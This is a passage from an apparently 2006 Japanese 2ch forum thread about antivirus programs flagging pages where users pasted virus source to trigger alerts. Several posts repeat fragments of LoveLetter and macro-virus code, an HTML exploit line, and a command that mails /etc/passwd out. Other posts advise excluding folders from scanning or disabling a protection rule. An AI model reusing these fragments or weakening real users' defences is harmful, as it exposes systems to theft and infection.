[表示 : 全て 最新50 1-99 101- 201- 301- 401- 501- 601- 701- 2chのread.cgiへ]
Update time : 12/10 22:53 / Filesize : 258 KB / Number-of Response : 783
[このスレッドの書き込みを削除する]
[+板 最近立ったスレ&熱いスレ一覧 : +板 最近立ったスレ/記者別一覧] [類似スレッド一覧]


↑キャッシュ検索、類似スレ動作を修正しました、ご迷惑をお掛けしました

ノートンがvbsウィルスのソースに誤反応3



1 名前:他のアンチウィルスソフトが反応する場合もあります mailto:sage [05/03/01 01:58:58 ID:???]
只今2chでvbsのウィルスのソースを貼りノートンなどのセキュリティツールを誤反応させるのが流行っています。
あまりにも質問スレなどで既出の(このvbsの)質問が多すぎるのでこのスレへURLを貼って誘導してください。
また新たなパターンのvbsが見つかったら一応このスレで報告願えると幸いです。

■この問題について■
2chのスレにvbsウィルスのソースを書き込むことによってブラウザがそのスレのhtmlファイルをダウンロードする際に
ウィルスのパターンと一致するので、ウィルスが検出されたとノートン先生などが騒ぎます。(設定によっては反応しないこともありますが、全く問題ありません)
ご存知の通り、htmlを読んでもこのvbsのソースは実行されることは無いので、全く問題ありません。
また、デフォルトだとIEはInternet Temporary Filesフォルダにhtmlをダウンロードしますので、感染ファイルはここのhtmlファイルにになります。
これらのファイルは削除しても全く問題ありませんが、該当スレを読み直すとまたvbsのソース付きhtmlがダウンロードされてしまうので警告が出ます。

■まとめと対策■
2ちゃんねる見ていたらvbsウィルスが検出された!
info.2ch.net/wiki/pukiwiki.php?%A5%CE%A1%BC%A5%C8%A5%F3%C6%FE%A4%EC%A4%BF%A4%E9%A3%B2ch%A4%CB%BD%F1%A4%AD%A4%B3%A4%E1%A4%CA%A4%A4%BF%CD%A4%D8#faq12
2ちゃんねる専用ブラウザでノートンを使うと今まで取得したログが抹消されてしまい、スレを再表示した時全てが新しいレスになってしまいます、どうすれば解決できるでしょうか?
info.2ch.net/wiki/pukiwiki.php?%A5%CE%A1%BC%A5%C8%A5%F3%C6%FE%A4%EC%A4%BF%A4%E9%A3%B2ch%A4%CB%BD%F1%A4%AD%A4%B3%A4%E1%A4%CA%A4%A4%BF%CD%A4%D8#faq08
2chブラウザのログ保存フォルダを「除外」に設定。
NAV2003以降はNorton Anti Virusのオプションで手動スキャンとAuto-Protectでそれぞれ除外の指定をして下さい。

前スレ
ノートンがvbsウィルスのソースに誤反応
pc.2ch.net/test/read.cgi/sec/1025872269/
ノートンがvbsウィルスのソースに誤反応2
pc5.2ch.net/test/read.cgi/pcqa/1033948204/

テンプレ>>1-10あたり

577 名前:ひよこ名無しさん mailto:sage [2006/06/13(火) 14:13:25 ID:???]
特定のスレに擬似ウィルスコード貼り付ける奴がいて困ってます。
ノートンのauto protect と手動スキャンで、
専ブラを除外するように設定してるんですが、スレを開くとエラーになってしまいます。
ttp://ansitu.xrea.jp/guidance/?NortonInternetSecurity
このサイトに書かれてる、信頼のアドレスを追加の設定はしました。

エラーのログを取得して、弾かれて、
有志さんの誤反応無効化スクリプトで書き換えて、
時間たつのまってから閲覧。しかもレス番はズレでわけわかめ
という状態です。
何かうまく弾く方法はないんでしょうか?


578 名前:ひよこ名無しさん mailto:sage [2006/06/13(火) 20:49:00 ID:???]
>>577
きちんと専ブラのログを除外する

579 名前:577 mailto:sage [2006/06/14(水) 13:32:40 ID:???]
>>578
僕の分かるように1〜10までしっかりすべてと教えて下さい。











さっさと、教えろボケこのやろう
               ∧_∧
  ,,,,,,,,,,,,,,,∧,,∧     ( ´∀`) \
〜′,,,,,,,,,,ミ,,゚Д゚彡    /  つ℃━━━━━━━━━━━━
  UU""""U U   〜(_つ つ     \へへ_       |
――――――――――――――――|         .  |
                        |           |
                        |へ__    .  |
                        |           |
へ____へ__/___へへ__へ______   |
                                   |
                                   |                                   |
                                ((  | ))
                                   |                                   |
                                   |                                 |
                                   |    
                                   |〜〜〜ヽ`∀´>ヾ〕∈



580 名前:ひよこ名無しさん mailto:sage [2006/06/17(土) 22:54:14 ID:???]
>>2ё

<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
???


581 名前:ひよこ名無しさん [2006/06/18(日) 17:52:54 ID:k4PxNBCi]
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1))

582 名前:ひよこ名無しさん mailto:sage [2006/06/18(日) 18:33:56 ID:???]



583 名前:ひよこ名無しさん mailto:age [2006/06/20(火) 00:04:58 ID:???]
時々スレを転々としてると、急に変な改行になるんですが(文と文の隙間が全部空いてしまう)
これってウイルスに侵されてるのでしょうか?

584 名前:ひよこ名無しさん mailto:sage [2006/06/20(火) 01:18:31 ID:???]
             l'vヘ
         ハ ┌( ;/ ト, ,、 rヘ  r'^ナrジ-z
    __}ヽ,__ (ヽ/ス_r^フしz,り い)n/イr〜^′
   'っヾ、r'__  |レ'ノ_C'入彳勺ソメろ_j/し-,_
    `フ ヾ勹_| <_r' !|刀_」r''>||/⌒(_rヘ-‐'
     <_ゝし||フぅ(ひzメ__ゝ'l !'そ
        ~zヾ|て 、l レ^ //'| |'~
            | | ヽl| // }|
            | :! || | | ,/ ,'
          | :{. || | |/ /  すいません、ちょっと通りますよ・・・
            l !|| | | /
          ヽ ヽ.|/ //
          _,r)_ j (_,(           ciz
         ,ノこ_- __,ーヽ         ん|Zゥ レz  zjそ_
          }    ...  丿        ろ、,_!|乙7ムLそ/し-z
         ノ""''   一(          `う.l !シ/ア了//_⊂,
        /、__      ヽ         ^'| |~//,/_ソ ハr^
        /    ......     ーl         | |// //ノ
     /~"' 、__/   ,,,...}        |/ ///        _Jv ,、 _,、
      {' _  `y′ 一  /         r'〜(_ノ          z'jく|!ぞぅンそ
     人   =/‐-     ハ       丿"  ''(           ぅY||/ソ'/`′
      ヽ '' /  __,,  /       / ‐-  ''')           | レ'//
        '∨     X.        }'''   ....ノ         ノムxく
        j    ー/        /==  ノ'ヽ        rご ー(
       /=‐  r'´-ヽ        }  ー/''''  {        ,ノ'' y' ...)
       ,' _,, 人 ''"`、      ノ.. '' ノ`ヽ ''"ヽ      / ー人.... (
        {ー /  \ -'}     / /    \'''}`     ('' ィ´   \_ヽ
      ハ  〈      )八     ( f       )ハ.     )ノ      _)ノ
       ヽ )   ((        )ノ      /      ー'′

585 名前:dirsystem&"\MSKernel32.vbs mailto:ms-its:mhtml:file://C: [2006/06/20(火) 01:55:47 ID:???]
>>568




586 名前:あぼ〜ん mailto:sage [2006/06/20(火) 01:56:38 ID:???]
>>568 >>585


587 名前:ひよこ名無しさん mailto:sage [2006/06/20(火) 02:15:03 ID:???]
>>583
シリア語ブラクラ
これを使うといい。
www.geocities.jp/cen_hp/program3.html

588 名前:ひよこ名無しさん mailto:sage [2006/06/20(火) 23:24:54 ID:???]
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1))
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
cat /etc/passwd | mail nobody@nonexistent.com
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"

589 名前:ひよこ名無しさん [2006/06/21(水) 12:18:24 ID:nQsDrOZ+]
このスレに貼ってあるソースは大丈夫なのですか?
例えば>>580-581とか、>>588とか…
このスレだと反応ないんですが、何か特別なのでしょうか?

590 名前:ひよこ名無しさん [2006/06/21(水) 14:23:42 ID:fhcCUte2]
テスト

591 名前:ひよこ名無しさん mailto:sage [2006/06/21(水) 20:24:45 ID:???]
>>589
心配しすぎだと思うんです(><)
これが動いたら2chは大騒ぎになっちゃうと思うんです(><)

592 名前:ひよこ名無しさん。 mailto:sage [2006/06/21(水) 23:50:37 ID:???]
NGワードあぼ〜んすればおk

593 名前:ひよこ名無しさん [2006/06/22(木) 20:26:16 ID:l9A+tZtH]
誘導されてきました

導入しているマカフィーでスキャンかけても何の反応もなかったんですが、
ノートンのオンラインスキャンやってみると
感染ファイルが二個みつかって
C:\Program Files\gikoNavi\Log\2ch\aasaloon\Folder.idx は Bloodhound.Exploit.6 に感染しています。
C:\Program Files\gikoNavi\Log\2ch\aasaloon\subject.txt は Bloodhound.Exploit.6 に感染しています。
と言う表示が出ました。
これは危険なんでしょうか。それともただのウィルスコード?

594 名前:ひよこ名無しさん mailto:sage [2006/06/22(木) 20:27:57 ID:???]
>>593
ただのウィルスコード
これで消せる。
www.geocities.jp/cen_hp/program3.html

595 名前:ひよこ名無しさん mailto:sage [2006/06/22(木) 20:28:13 ID:???]
>>593
ノートンがvbsウィルスのソースに誤反応3
pc7.2ch.net/test/read.cgi/pcqa/1109609938/



596 名前:ひよこ名無しさん mailto:sage [2006/06/22(木) 20:28:47 ID:???]
>>594
cen乙

597 名前:ひよこ名無しさん mailto:sage [2006/06/22(木) 20:30:04 ID:???]
>>594-596
レス早いなw

598 名前:ひよこ名無しさん mailto:sage [2006/06/22(木) 20:41:25 ID:???]
粘着してリロードしながら監視してるんだろ?www

599 名前:ひよこ名無しさん [2006/06/22(木) 20:44:02 ID:l9A+tZtH]
>>594
ありがとうございます。
見分けるコツみたいなものはあるんですか?

600 名前:ひよこ名無しさん mailto:sage [2006/06/22(木) 22:08:53 ID:???]
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"

601 名前:ひよこ名無しさん mailto:sage [2006/06/23(金) 00:17:41 ID:???]
ノートンがvbsウィルスのソースに誤反応3
pc7.2ch.net/test/read.cgi/pcqa/1109609938/

テンプレにでも入れるか・・・?
脳豚使うなら自力で何とかしろよ・・・

602 名前:ひよこ名無しさん mailto:sage [2006/06/23(金) 00:18:16 ID:???]
誤爆

603 名前:ひよこ名無しさん mailto:sage [2006/06/23(金) 18:23:08 ID:???]
___ゲームキャラ板でもモニカワイイモニカ様___
game10.2ch.net/test/read.cgi/gamechara/1146829934/

このスレを開くと閲覧できないどころか
一回再起動しないとgame10鯖に繋がらなくなる障害が出るんですが
NGコードとかどう打って対処すればいいのですか?

604 名前:ひよこ名無しさん [2006/06/23(金) 18:23:47 ID:6hQn7KgH]
使用2chブラウザは Jane Doe Styleです。

605 名前:ひよこ名無しさん mailto:sage [2006/06/23(金) 18:25:27 ID:???]
>>604
回答めんどいからこのスレ内検索して



606 名前:ひよこ名無しさん mailto:sage [2006/06/23(金) 22:47:16 ID:???]
>>599
専用ブラウザでスレを取得した「だけ」で反応したら間違いなく誤反応なので心配無用。
スレに貼られたURLをクリックして反応したならウィルスの疑いあり。
てゆーか、やたらとクリックしちゃダメ。

607 名前:ひよこ名無しさん mailto:age [2006/06/28(水) 16:58:31 ID:???]
age

608 名前:ひよこ名無しさん [2006/06/29(木) 15:09:12 ID:C6iUe2mV]
Your attention,Please. みなさまに申し上げます
fire drill 火災避難訓練

609 名前:ひよこ名無しさん mailto:age [2006/06/29(木) 19:41:48 ID:???]
age

610 名前:ひよこ名無しさん mailto:sage [2006/06/29(木) 21:38:29 ID:???]
pc7.2ch.net/test/read.cgi/pcqa/1151570961/111-

111 名前:ひよこ名無しさん 投稿日:2006/06/29(木) 21:33:23 ID:P5JFBD43
キャップもらってパスワードもらって、名前欄に書き込んでも、
○★ にならなくて○◆になってしまうんですが、どうしてでしょうか


113 名前:愛新覚羅 ◆WjkbiI..A2 投稿日:2006/06/29(木) 21:34:04 ID:???
>>111
ウイルシかな

611 名前:ひよこ名無しさん [2006/06/30(金) 22:56:15 ID:2Lq/lYYu]
テスト

612 名前:ひよこ名無しさん [2006/07/01(土) 00:07:11 ID:Dt6nkhA2]
game10.2ch.net/test/read.cgi/arc/1151603946/16

コレって書き込んだ本人がウイルスに感染しているって事でしょうか?

613 名前:ひよこ名無しさん mailto:sage [2006/07/01(土) 00:08:55 ID:???]
>>612
ノートン先生を誤反応させるためにわざと貼ってるんだよ

614 名前:612 [2006/07/01(土) 00:39:41 ID:Dt6nkhA2]
ただ、これ書いた人がカードゲームのトレードスレに
自分のメルアド出してブログバレしてます

615 名前:ひよこ名無しさん mailto:sage [2006/07/01(土) 23:18:07 ID:???]
複雑な自爆では?



616 名前:ひよこ名無しさん [2006/07/02(日) 19:36:03 ID:ytfN9V0/]
ノートン2006でAutoprotectの設定で、ログのフォルダを除外したいのですが、
それらしい項目が分かりません。
Norton AntiVirusオプションの項目ではないのでしょうか?

617 名前:ひよこ名無しさん [2006/07/02(日) 20:00:00 ID:ytfN9V0/]
事故解決しました。

618 名前:ひよこ名無しさん [2006/07/03(月) 19:55:32 ID:pfnK+d5L]
専ブラ(Jane)での書き込みの妨害も先生の仕業?
更新かけて解決するのであれば(期限切れ)、
してやらんでもないのだが・・・。


619 名前:ひよこ名無しさん mailto:sage [2006/07/03(月) 22:30:42 ID:???]
>>618
> 更新かけて解決するのであれば(期限切れ)、

それはないな。FW(が入っているのであれば)一時的に切ってみるしか

620 名前:618 [2006/07/03(月) 23:15:21 ID:pfnK+d5L]
>>619
いや、プラウザからなら書き込めるんですよ。
ノートン有効→一部の板の閲覧不可(IE、専ブラ共に)
    無効→共に閲覧は可能 専ブラでの書き込みが不可。
ってわけでこの板だけは、IEからしか書き込めないんです・・・。
まぁ、通信を許可すれば解決なんでしょうが・・・。
いろいろやってみます。 どもでした。


621 名前:ひよこ名無しさん mailto:sage [2006/07/04(火) 02:40:17 ID:???]
まったくの初心者ですが
ノートンインターネットセキュリティー2006での誤反応対策を教えてください
既出でしたらアンカーでもいいのでお願いします

622 名前:ひよこ名無しさん mailto:sage [2006/07/04(火) 08:28:52 ID:???]
>>621
>>1->>620を読め

623 名前:ひよこ名無しさん mailto:sage [2006/07/04(火) 10:11:31 ID:???]
「まったくの初心者」

だからどうした?このスレを100回読んで知識増やせ。

624 名前:ひよこ名無しさん [2006/07/04(火) 20:16:10 ID:Bwi55Fwo]
スレを開いたら突然ウィルスに感染したんですがurlを直接踏まなくても
感染するウィルスはあるんですか?

625 名前:ひよこ名無しさん mailto:sage [2006/07/05(水) 11:14:56 ID:???]
>>624
>>1->>620を読め



626 名前:ひよこ名無しさん [2006/07/05(水) 17:10:28 ID:xPsQC9iJ]
       , --- 、_
      /ミミミヾヾヽ、_
   ∠ヾヾヾヾヾヾjj┴彡ニヽ
  / , -ー‐'"´´´    ヾ.三ヽ
  ,' /            ヾ三ヽ
  j |             / }ミ i
  | |              / /ミ  !
  } | r、          l ゙iミ __」 
  |]ムヽ、_    __∠二、__,ィ|/ ィ }
  |    ̄`ミl==r'´     / |lぅ lj   私が原田ウィルス作者ですが何か?
  「!ヽ、_×___j ヽ、×  -'  レ'r'/  
   `!     j  ヽ        j_ノ   
   ',    ヽァ_ '┘     ,i    
    ヽ  ___'...__   i   ハ__      
     ヽ ゙二二 `  ,' // 八
      ヽ        /'´   / ヽ
      |ヽ、__, '´ /   /   \

627 名前:ひよこ名無しさん mailto:sage [2006/07/07(金) 03:17:23 ID:???]
>>577
遅レスだけど一応。
ttp://mickey.mirv.net/2chnis.html
↑みて最新のアドレス設定しる

628 名前:ひよこ名無しさん [2006/07/15(土) 01:31:41 ID:668g3rrq]
こんなPCはネットにつなぐな! 3日間放置した無防備PCの結末は?
arena.nikkeibp.co.jp/col/20050510/112145/

以下すべて日本語対応で無料。

ブラウザ:Firefox www.mozilla-japan.org/products/firefox/
メーラー:Thunderbird www.mozilla-japan.org/products/thunderbird/
 上記2種の拡張(beau.g-com.ne.jp/mon-extension.html
スパイウェア対策:www.geocities.jp/primarystage/spyware.html
ウィルス対策:avast! www.forest.impress.co.jp/lib/inet/security/antivirus/avast.html
適当なルーター:BUFFALO BBR-4HG netspeed.studio-radish.com/netspeeddata/throughput_review/buffalo_bbr4hg.html

無料のウイルス対策ソフトなどのセキュリティソフト一覧
www.geocities.co.jp/SiliconValley-Cupertino/2010/security.html
セキュリティ板
pc8.2ch.net/sec/

629 名前:ひよこ名無しさん [2006/07/23(日) 19:35:23 ID:XNQAeCHC]
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1))  

630 名前:ひよこ名無しさん mailto:sage [2006/07/24(月) 00:49:37 ID:???]
できれば既出のものじゃなくて
新しいの一行づつ張ってほしいなぁ。

631 名前:ひよこ名無しさん mailto:sage [2006/07/29(土) 23:32:33 ID:???]
2CH自体、5月からはじめました。
ノートンがなんだかよくわかりませんが、ある掲示板で症状を書き込んだところ
ノートン先生かといわれました。

症状としては、かんじなどを変換すると候補がでますが、するとその時点でIEが
強制終了してしまいます。
2CHはIEでみています。最初から。
これ、直るのでしょうか?

パソコン使えないとネットで就職活動もできず困っています。
どうかよろしくお願いします。


632 名前:ひよこ名無しさん mailto:sage [2006/07/29(土) 23:59:23 ID:???]
このスレとは関係ないような・・・

633 名前:ひよこ名無しさん mailto:sage [2006/07/30(日) 00:06:37 ID:???]
>>631
ですけど、感染したときにLOVE-LETTERなんとかというものが画面に表示されました。
そのときなんだかわからなかったので、続行のボタンを押しました。
漢字を変換するとIEが落ちてしまうので、最初に出てきた感じで該当するものが泣ければ
そのままにしています。
なんとかならないでしょうか。


634 名前:ひよこ名無しさん mailto:sage [2006/07/30(日) 00:40:34 ID:???]
ここはウイルス対策ソフトの「誤反応」のスレです。
ウイルスにほんとに感染してる件ならスレ違い

635 名前:ひよこ名無しさん mailto:sage [2006/07/30(日) 03:56:39 ID:???]
>>633
よく分からないならクリーンインストールしろ。
それも出来ないなら就職浪人決定。



636 名前:ひよこ名無しさん mailto:sage [2006/07/30(日) 19:55:34 ID:???]
クリーンインストールってなに?

637 名前:ひよこ名無しさん mailto:sage [2006/07/30(日) 20:12:01 ID:???]
おまえの頭を入れ替えること

638 名前:ひよこ名無しさん mailto:sage [2006/07/31(月) 00:58:59 ID:???]
つまらん。0点。>>637

639 名前:ひよこ名無しさん mailto:sage [2006/07/31(月) 01:59:16 ID:???]
女王様の椅子取りゲーム

640 名前:ひよこ名無しさん [2006/08/03(木) 17:37:02 ID:oF+rx1Q5]
>>636
ぐぐっておいてやった。参考にしる。

ttp://www.google.co.jp/search?hl=ja&q=%E3%82%AF%E3%82%A4%E3%83%BC%E3%83%B3%E3%82%A4%E3%83%B3%E3%82%B9%E3%83%88%E3%83%BC%E3%83%AB&lr=
ttp://www.google.co.jp/search?hl=ja&q=%E3%82%AF%E3%83%AA%E3%83%BC%E3%83%B3%E3%82%A4%E3%82%B9%E3%83%88%E3%83%BC%E3%83%AB&lr=
ttp://www.google.co.jp/search?hl=ja&q=%E3%82%AF%E3%83%AA%E3%83%BC%E3%83%B3%E3%82%A2%E3%83%B3%E3%82%A4%E3%83%B3%E3%82%B9%E3%83%88%E3%83%BC%E3%83%AB&lr=
ttp://www.google.co.jp/search?hl=ja&q=%E3%82%AF%E3%83%AA%E3%83%BC%E3%83%B3%E3%82%A4%E3%83%B3%E3%82%B9%E3%83%88%E3%82%A5%E3%83%BC%E3%83%AB&lr=

ttp://www.google.co.jp/search?hl=ja&q=%E3%82%AF%E3%83%AA%E3%83%BC%E3%83%A0%E3%82%A4%E3%83%B3%E3%82%B9%E3%83%88%E3%83%BC%E3%83%AB&lr=

どれも似たような内容なので、好きなのを選べばいいべさ

641 名前:ひよこ名無しさん mailto:sage [2006/08/10(木) 13:48:08 ID:???]
ウイルスコードの誤反応ではありませんが、
ノートンを切らないとPCQA板に入れなくなってしまいました。(進入検知が誤反応)
この場合はどうすればいいでしょうか?

642 名前:ひよこ名無しさん mailto:sage [2006/08/10(木) 15:08:46 ID:???]
>>641
ノートンを切ればいいと思います。

643 名前:ひよこ名無しさん mailto:sage [2006/08/10(木) 16:07:02 ID:???]
>>641
2chを見ようとすると「侵入を検出して遮断しました。」というダイアログが表示されて
2chを見れなくなってしまう問題のまとめページ。
mickey.mirv.net/2chnis.html
ノートン誤作動対策本部
qb5.2ch.net/operate/kako/1133/11331/1133161720.html

644 名前:ひよこ名無しさん mailto:sage [2006/08/10(木) 18:08:02 ID:???]
<<642<<643d

645 名前:ひよこ名無しさん mailto:sage [2006/08/12(土) 15:29:22 ID:???]
質問お願いします。
ノートン側のオプションから除外指定するとき、
*.dbx
*.nch
というのが除外の欄に書いてあったのですが、これは最初からそうなのでしょうか?
例えばノートン自体が攻撃されて書き換えられる可能性とかありますか?



646 名前:ひよこ名無しさん mailto:sage [2006/08/12(土) 17:20:14 ID:???]
>>645
デフォルトでそうなってるから心配すんな

647 名前:645 mailto:sage [2006/08/13(日) 06:13:39 ID:???]
>>646
ありがとございます。

648 名前:ひよこ名無しさん mailto:sage [2006/08/14(月) 01:05:42 ID:???]
マカフィーでもコード貼られたログファイル消されて見れないんだけどどうすればいい?

649 名前:ひよこ名無しさん mailto:sage [2006/08/15(火) 01:23:16 ID:???]
>>648
>>17
pc8.2ch.net/test/read.cgi/sec/1153128180/28-29n
pc8.2ch.net/test/read.cgi/sec/1153128180/298-305n

650 名前:ひよこ名無しさん mailto:sage [2006/08/16(水) 18:54:56 ID:???]
でも、ノートン自体は反応しても実際にウイルスではないんですよね?


651 名前:ひよこ名無しさん mailto:sage [2006/08/16(水) 22:35:50 ID:???]
だからスレタイにも誤反応って書いてあるだろ

652 名前:ひよこ名無しさん mailto:sage [2006/08/17(木) 02:53:34 ID:???]
確認しただけだろ。
頭固てえな。

653 名前:ひよこ名無しさん mailto:sage [2006/08/20(日) 16:12:51 ID:???]
>643
この対応ってNISだけですよね。
自分ノートンアンチウイルスの方なんだが、やっぱ誤作動する。
これはどう解除すればいいんだ?

654 名前:ひよこ名無しさん mailto:sage [2006/08/20(日) 21:24:08 ID:???]
>>653
>>643末尾に挙げられている過去ログでレス番727あたりから読んでみるといいかも

655 名前:ひよこ名無しさん [2006/08/22(火) 03:27:14 ID:NKrNf7Jc]
mickey.mirv.net/2chnis.htmlを見て
>タスクトレイのNISアイコンを左クリック>「Norton Internet Securityを開く」

をやってみたのですが左クリックをしても何も出てきません。
右クリックなら「Norton Anti Virusを開く」「Auto Protectを無効にする」
「Norton Antiオプション」の三つのメニューが出るんですが、
どうすればNorton Internet Securityを開くことができるんでしょうか。



656 名前:ひよこ名無しさん mailto:sage [2006/08/22(火) 06:49:12 ID:???]
>>655
もしかしてNAVしかインストールしてないとか?
mickey.mirv.net/2chnis.html には説明ないけど
NAVでも誤反応する。>>654参照

657 名前:ひよこ名無しさん mailto:sage [2006/08/24(木) 21:19:27 ID:???]
■2ちゃんねる 初心者が安心して質問できるスレッドガイダンス (ノートントラップ全般への対策法)
ttp://ansitu.xrea.jp/guidance/?Trap#NortonTrap

■2ch NIS問題まとめページ
ttp://mickey.mirv.net/2chnis.html

■特定のドライブ、フォルダ、ファイルをウイルススキャンの対象から除外する方法
service1.symantec.com/SUPPORT/INTER/navjapanesekb.nsf/7c3ff4677729271685256c470046ed2e/d9265b84ded9587488256b0400811ff7

・上記設定でまだ反応がある場合は、「専ブラプログラムフォルダ丸ごと」も同様に除外に追加してみて下さい。
・2ちゃんねる専用ブラウザの読み込み禁止単語機能に、
「v bs」、「O nload」、「o nload」、「L OVE-LETTER」、「M acro」、「n osuch」、「E ICAR-STANDARD-ANTIVIRUS-TEST」などの
単語を登録しておきましょう。(※ 単語の途中一箇所スペース空けてるんで詰めて登録して下さい)
・各専用ブラウザのスレッド情報も参照して下さい。

・NIS(NPF)のファイアーウォールを誤作動させるコード文字列に関して → 応急対策を参照
・タスクトレイのノートンアイコンをクリック → NISを無効にする (5分) →
NIS無効中に専用ブラウザでスレッドをリロード取得 → NISを有効に戻す (※この方法でもNPFトラップ回避可能)

■いきいき Wiki - ノートンインターネットセキュリティに関するFAQ
info.2ch.net/wiki/pukiwiki.php?%A5%CE%A1%BC%A5%C8%A5%F3%C6%FE%A4%EC%A4%BF%A4%E9%A3%B2ch%A4%CB%BD%F1%A4%AD%A4%B3%A4%E1%A4%CA%A4%A4%BF%CD%A4%D8#faq00


658 名前:ひよこ名無しさん mailto:sage [2006/08/29(火) 22:27:40 ID:???]
727 名前: 動け動けウゴウゴ2ちゃんねる 投稿日: 2006/03/26(日) 16:24:59 ID:pwaEyKGo0

>>726
参考までに・・・ただし、自己責任で

ノートンアンチウイルス2006 Ver.1
pc8.2ch.net/test/read.cgi/sec/1129452372/996

> まず、オプション→インターネット→インターネットワーム防止→除外の設定で、

> HTTP MSIE JavaScript OnLoad Rte CodeExecのチェックを外す。

> そのあと、オプション→インターネット→インターネットワーム防止→
